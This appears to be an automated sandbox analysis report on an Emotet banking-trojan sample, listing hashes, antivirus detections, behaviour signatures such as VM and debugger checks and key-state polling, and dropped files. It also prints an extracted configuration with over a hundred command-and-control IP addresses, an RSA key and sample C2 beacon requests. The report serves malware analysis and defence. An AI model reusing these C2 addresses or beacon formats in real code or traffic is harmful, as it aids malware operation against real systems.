Analysis Report JI93UWUR2p.exe

Overview

General Information

Sample Name: JI93UWUR2p.exe
Analysis ID: 318892
MD5: b2648f9f8ef41a5b1073afc1b5f70f7b
SHA1: d28b4602f1ae9bd282183761a3992c10515734d5
SHA256: 0b283e6ca397953eb86bb7842aa5ae2de6bb651c5e58349e839e1dbc304e96f8

Most interesting Screenshot:

Detection

Emotet
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: JI93UWUR2p.exe Avira: detected
Source: JI93UWUR2p.exe Avira: detected
Found malware configuration
Source: 00000000.00000002.648301312.0000000002180000.00000040.00000001.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["186.189.249.2:80", "59.148.253.194:8080", "173.212.197.71:8080", "5.89.33.136:80", "177.144.130.105:443", "190.190.219.184:80", "82.76.111.249:443", "70.32.115.157:8080", "62.84.75.50:80", "190.24.243.186:80", "51.15.7.145:80", "24.232.228.233:80", "46.105.114.137:8080", "216.47.196.104:80", "172.86.186.21:8080", "186.103.141.250:443", "128.92.203.42:80", "190.188.245.242:80", "152.169.22.67:80", "170.81.48.2:80", "178.211.45.66:8080", "201.71.228.86:80", "111.67.12.221:8080", "70.169.17.134:80", "5.196.35.138:7080", "104.131.41.185:8080", "60.93.23.51:80", "181.123.6.86:80", "137.74.106.111:7080", "51.15.7.189:80", "94.176.234.118:443", "74.135.120.91:80", "188.135.15.49:80", "77.78.196.173:443", "177.73.0.98:443", "213.52.74.198:80", "177.144.130.105:8080", "177.74.228.34:80", "209.236.123.42:8080", "37.187.161.206:8080", "174.118.202.24:443", "178.250.54.208:8080", "109.190.35.249:80", "188.251.213.180:80", "191.182.6.118:80", "64.201.88.132:80", "79.118.74.90:80", "177.129.17.170:443", "212.71.237.140:8080", "109.190.249.106:80", "192.232.229.54:7080", "189.223.16.99:80", "201.213.177.139:80", "85.214.26.7:8080", "191.191.23.135:80", "46.43.2.95:8080", "50.28.51.143:8080", "98.103.204.12:443", "37.179.145.105:80", "46.101.58.37:8080", "2.45.176.233:80", "74.58.215.226:80", "68.183.190.199:8080", "185.94.252.27:443", "186.222.250.115:8080", "51.255.165.160:8080", "138.97.60.140:8080", "183.176.82.231:80", "105.209.235.113:8080", "77.238.212.227:80", "103.236.179.162:80", "45.46.37.97:80", "83.169.21.32:7080", "217.13.106.14:8080", "68.183.170.114:8080", "192.241.143.52:8080", "202.134.4.210:7080", "177.23.7.151:80", "192.81.38.31:80", "188.157.101.114:80", "185.183.16.47:80", "181.129.96.162:8080", "87.106.46.107:8080", "149.202.72.142:7080", "175.143.12.123:8080", "98.13.75.196:80", "12.163.208.58:80", "5.189.178.202:8080", "138.97.60.141:7080", "181.30.61.163:443", "219.92.13.25:80", "181.61.182.143:80", "213.197.182.158:8080", "1.226.84.243:8080", "12.162.84.2:8080", "189.2.177.210:443", "185.94.252.12:80", "51.75.33.127:80", "190.115.18.139:8080", "70.32.84.74:8080", "81.215.230.173:443", "172.104.169.32:8080", "37.183.81.217:80", "200.127.14.97:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
Source: 00000000.00000002.648301312.0000000002180000.00000040.00000001.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["186.189.249.2:80", "59.148.253.194:8080", "173.212.197.71:8080", "5.89.33.136:80", "177.144.130.105:443", "190.190.219.184:80", "82.76.111.249:443", "70.32.115.157:8080", "62.84.75.50:80", "190.24.243.186:80", "51.15.7.145:80", "24.232.228.233:80", "46.105.114.137:8080", "216.47.196.104:80", "172.86.186.21:8080", "186.103.141.250:443", "128.92.203.42:80", "190.188.245.242:80", "152.169.22.67:80", "170.81.48.2:80", "178.211.45.66:8080", "201.71.228.86:80", "111.67.12.221:8080", "70.169.17.134:80", "5.196.35.138:7080", "104.131.41.185:8080", "60.93.23.51:80", "181.123.6.86:80", "137.74.106.111:7080", "51.15.7.189:80", "94.176.234.118:443", "74.135.120.91:80", "188.135.15.49:80", "77.78.196.173:443", "177.73.0.98:443", "213.52.74.198:80", "177.144.130.105:8080", "177.74.228.34:80", "209.236.123.42:8080", "37.187.161.206:8080", "174.118.202.24:443", "178.250.54.208:8080", "109.190.35.249:80", "188.251.213.180:80", "191.182.6.118:80", "64.201.88.132:80", "79.118.74.90:80", "177.129.17.170:443", "212.71.237.140:8080", "109.190.249.106:80", "192.232.229.54:7080", "189.223.16.99:80", "201.213.177.139:80", "85.214.26.7:8080", "191.191.23.135:80", "46.43.2.95:8080", "50.28.51.143:8080", "98.103.204.12:443", "37.179.145.105:80", "46.101.58.37:8080", "2.45.176.233:80", "74.58.215.226:80", "68.183.190.199:8080", "185.94.252.27:443", "186.222.250.115:8080", "51.255.165.160:8080", "138.97.60.140:8080", "183.176.82.231:80", "105.209.235.113:8080", "77.238.212.227:80", "103.236.179.162:80", "45.46.37.97:80", "83.169.21.32:7080", "217.13.106.14:8080", "68.183.170.114:8080", "192.241.143.52:8080", "202.134.4.210:7080", "177.23.7.151:80", "192.81.38.31:80", "188.157.101.114:80", "185.183.16.47:80", "181.129.96.162:8080", "87.106.46.107:8080", "149.202.72.142:7080", "175.143.12.123:8080", "98.13.75.196:80", "12.163.208.58:80", "5.189.178.202:8080", "138.97.60.141:7080", "181.30.61.163:443", "219.92.13.25:80", "181.61.182.143:80", "213.197.182.158:8080", "1.226.84.243:8080", "12.162.84.2:8080", "189.2.177.210:443", "185.94.252.12:80", "51.75.33.127:80", "190.115.18.139:8080", "70.32.84.74:8080", "81.215.230.173:443", "172.104.169.32:8080", "37.183.81.217:80", "200.127.14.97:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
Multi AV Scanner detection for submitted file
Source: JI93UWUR2p.exe Virustotal: Detection: 70% Perma Link
Source: JI93UWUR2p.exe ReversingLabs: Detection: 89%
Source: JI93UWUR2p.exe Virustotal: Detection: 70% Perma Link
Source: JI93UWUR2p.exe ReversingLabs: Detection: 89%
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.JI93UWUR2p.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.ewy
Source: 1.0.winusb.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.ewy
Source: 0.0.JI93UWUR2p.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.ewy
Source: 1.0.winusb.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.ewy

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_022121D0 CryptDuplicateHash,CryptDestroyHash,CryptGetHashParam,CryptEncrypt,GetProcessHeap,RtlAllocateHeap,memcpy,CryptExportKey, 1_2_022121D0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02212590 CryptCreateHash,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalFree,CryptGenKey,GetProcessHeap,HeapFree, 1_2_02212590
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02211F28 CryptDecrypt, 1_2_02211F28
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02211F10 CryptDecrypt,CryptDestroyHash,memcpy,CryptDuplicateHash,CryptVerifySignatureW,GetProcessHeap,HeapFree, 1_2_02211F10
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_022121D0 CryptDuplicateHash,CryptDestroyHash,CryptGetHashParam,CryptEncrypt,GetProcessHeap,RtlAllocateHeap,memcpy,CryptExportKey, 1_2_022121D0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02212590 CryptCreateHash,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalFree,CryptGenKey,GetProcessHeap,HeapFree, 1_2_02212590
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02211F28 CryptDecrypt, 1_2_02211F28
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02211F10 CryptDecrypt,CryptDestroyHash,memcpy,CryptDuplicateHash,CryptVerifySignatureW,GetProcessHeap,HeapFree, 1_2_02211F10
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_021D38A0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_021D38A0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_022138A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 1_2_022138A0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.4:49749 -> 186.189.249.2:80
Source: Traffic Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49763 -> 59.148.253.194:8080
Source: Traffic Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.4:49749 -> 186.189.249.2:80
Source: Traffic Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49763 -> 59.148.253.194:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49763 -> 59.148.253.194:8080
Source: global traffic TCP traffic: 192.168.2.4:49763 -> 59.148.253.194:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 59.148.253.194 59.148.253.194
Source: Joe Sandbox View IP Address: 59.148.253.194 59.148.253.194
Source: Joe Sandbox View IP Address: 186.189.249.2 186.189.249.2
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HKBN-AS-APHongKongBroadbandNetworkLtdHK HKBN-AS-APHongKongBroadbandNetworkLtdHK
Source: Joe Sandbox View ASN Name: HKBN-AS-APHongKongBroadbandNetworkLtdHK HKBN-AS-APHongKongBroadbandNetworkLtdHK
Source: Joe Sandbox View ASN Name: NSSSAAR NSSSAAR
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.4:49749 -> 186.189.249.2:80
Source: global traffic TCP traffic: 192.168.2.4:49749 -> 186.189.249.2:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /VUesxvJLqsgRPBri0T/KPhOAHSN2kVSzn/bJeXeF1LVEmM6VM/fQdoG2HH9qeGa/plktldVlzb8csJM4Ibv/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------FHY8tOFpWJBZLSwMxRmYW9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4644Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /VUesxvJLqsgRPBri0T/KPhOAHSN2kVSzn/bJeXeF1LVEmM6VM/fQdoG2HH9qeGa/plktldVlzb8csJM4Ibv/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------FHY8tOFpWJBZLSwMxRmYW9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4644Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 186.189.249.2
Source: unknown TCP traffic detected without corresponding DNS query: 186.189.249.2
Source: unknown TCP traffic detected without corresponding DNS query: 186.189.249.2
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 186.189.249.2
Source: unknown TCP traffic detected without corresponding DNS query: 186.189.249.2
Source: unknown TCP traffic detected without corresponding DNS query: 186.189.249.2
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02212940 GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,HttpQueryInfoW, 1_2_02212940
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02212940 GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,HttpQueryInfoW, 1_2_02212940
Source: unknown HTTP traffic detected: POST /VUesxvJLqsgRPBri0T/KPhOAHSN2kVSzn/bJeXeF1LVEmM6VM/fQdoG2HH9qeGa/plktldVlzb8csJM4Ibv/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------FHY8tOFpWJBZLSwMxRmYW9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4644Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /VUesxvJLqsgRPBri0T/KPhOAHSN2kVSzn/bJeXeF1LVEmM6VM/fQdoG2HH9qeGa/plktldVlzb8csJM4Ibv/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------FHY8tOFpWJBZLSwMxRmYW9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4644Cache-Control: no-cache
Source: winusb.exe, 00000001.00000003.729797849.000000000290D000.00000004.00000001.sdmp String found in binary or memory: http://186.189.249.2/Wa57zPwBH2jYV/92TmuTyey/7gOYi9Zoit9x01Ipx9/APWTl0lAhKxUxI/G3oSW9PKXkWBEWzv/uGJr
Source: winusb.exe, 00000001.00000002.915417523.000000000290F000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/VUesxvJLqsgRPBri0T/KPhOAHSN2kVSzn/bJeXeF1LVEmM6VM/fQdoG2HH9qeGa/plktldVlz
Source: winusb.exe, 00000001.00000003.729797849.000000000290D000.00000004.00000001.sdmp String found in binary or memory: http://186.189.249.2/Wa57zPwBH2jYV/92TmuTyey/7gOYi9Zoit9x01Ipx9/APWTl0lAhKxUxI/G3oSW9PKXkWBEWzv/uGJr
Source: winusb.exe, 00000001.00000002.915417523.000000000290F000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/VUesxvJLqsgRPBri0T/KPhOAHSN2kVSzn/bJeXeF1LVEmM6VM/fQdoG2HH9qeGa/plktldVlz

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004137E2 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_004137E2
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004137E2 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_004137E2
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_004137E2 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 1_2_004137E2

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000000.00000002.648301312.0000000002180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.914566076.0000000000650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.648328999.00000000021A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.914790785.00000000021E4000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Creates files inside the system directory
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File created: C:\Windows\SysWOW64\mstsc\ Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File created: C:\Windows\SysWOW64\mstsc\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File deleted: C:\Windows\SysWOW64\mstsc\winusb.exe:Zone.Identifier Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File deleted: C:\Windows\SysWOW64\mstsc\winusb.exe:Zone.Identifier Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004150BB 0_2_004150BB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004231CF 0_2_004231CF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041F1D8 0_2_0041F1D8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042D48E 0_2_0042D48E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041F5AC 0_2_0041F5AC
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042E60E 0_2_0042E60E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042D9D2 0_2_0042D9D2
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041F9B8 0_2_0041F9B8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042FCB1 0_2_0042FCB1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041ED03 0_2_0041ED03
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041FDD8 0_2_0041FDD8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042DF16 0_2_0042DF16
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D8220 0_2_021D8220
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D7EA0 0_2_021D7EA0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D7640 0_2_021D7640
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D64C0 0_2_021D64C0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D1B80 0_2_021D1B80
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02189A3E 0_2_02189A3E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218E02F 0_2_0218E02F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218805E 0_2_0218805E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021891DE 0_2_021891DE
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218371E 0_2_0218371E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0219E74D 0_2_0219E74D
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218DFFB 0_2_0218DFFB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218E4AF 0_2_0218E4AF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02189DBE 0_2_02189DBE
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218E5EA 0_2_0218E5EA
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004150BB 0_2_004150BB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004231CF 0_2_004231CF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041F1D8 0_2_0041F1D8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042D48E 0_2_0042D48E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041F5AC 0_2_0041F5AC
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042E60E 0_2_0042E60E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042D9D2 0_2_0042D9D2
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041F9B8 0_2_0041F9B8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042FCB1 0_2_0042FCB1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041ED03 0_2_0041ED03
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041FDD8 0_2_0041FDD8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042DF16 0_2_0042DF16
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D8220 0_2_021D8220
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D7EA0 0_2_021D7EA0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D7640 0_2_021D7640
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D64C0 0_2_021D64C0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D1B80 0_2_021D1B80
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02189A3E 0_2_02189A3E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218E02F 0_2_0218E02F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218805E 0_2_0218805E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021891DE 0_2_021891DE
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218371E 0_2_0218371E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0219E74D 0_2_0219E74D
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218DFFB 0_2_0218DFFB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218E4AF 0_2_0218E4AF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02189DBE 0_2_02189DBE
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218E5EA 0_2_0218E5EA
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_004150BB 1_2_004150BB
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_004231CF 1_2_004231CF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041F1D8 1_2_0041F1D8
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042D48E 1_2_0042D48E
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041F5AC 1_2_0041F5AC
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042E60E 1_2_0042E60E
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042D9D2 1_2_0042D9D2
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041F9B8 1_2_0041F9B8
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042FCB1 1_2_0042FCB1
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041ED03 1_2_0041ED03
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041FDD8 1_2_0041FDD8
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042DF16 1_2_0042DF16
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02218220 1_2_02218220
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02217640 1_2_02217640
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_022164C0 1_2_022164C0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02211B80 1_2_02211B80
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02217EA0 1_2_02217EA0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004203A0 appears 62 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004011C0 appears 58 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 0041E5AD appears 92 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 00419CA9 appears 109 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004031B0 appears 37 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004033F0 appears 52 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 00418E47 appears 40 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 004203A0 appears 62 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 004011C0 appears 58 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 0041E5AD appears 92 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 00419CA9 appears 109 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 004031B0 appears 37 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 004033F0 appears 52 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 00418E47 appears 40 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004203A0 appears 62 times
